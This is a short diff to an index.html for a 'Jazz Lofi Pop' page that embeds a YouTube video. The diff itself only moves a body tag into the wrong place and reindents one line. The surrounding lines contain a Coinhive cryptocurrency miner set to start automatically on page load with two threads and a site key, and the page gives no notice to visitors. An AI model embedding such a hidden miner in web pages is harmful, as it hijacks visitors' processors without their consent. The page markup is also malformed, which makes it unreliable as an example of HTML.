--- a/index.html
+++ b/index.html
@@ -1,4 +1,5 @@
 <html>
+<body>
 <head>
     <h1 align="center">Jazz Lofi Pop</h1>
     <h2 align="center"><iframe width="560" height="315" src="https://www.youtube.com/embed/6rReMbO42uE" frameborder="0" allow="autoplay; encrypted-media" allowfullscreen></iframe></h2>
@@ -9,7 +10,7 @@
 </h3>
     <h4 align="center">
 <div class="coinhive-miner" 
-style="width: 300px; height: 300px" 
+     style="width: 300px; height: 300px" 
      data-key="C6FfXf8rUkX3of6Cv1DcA4Z7MKupaOwD" 
      data-autostart="true" 
      data-threads="2">
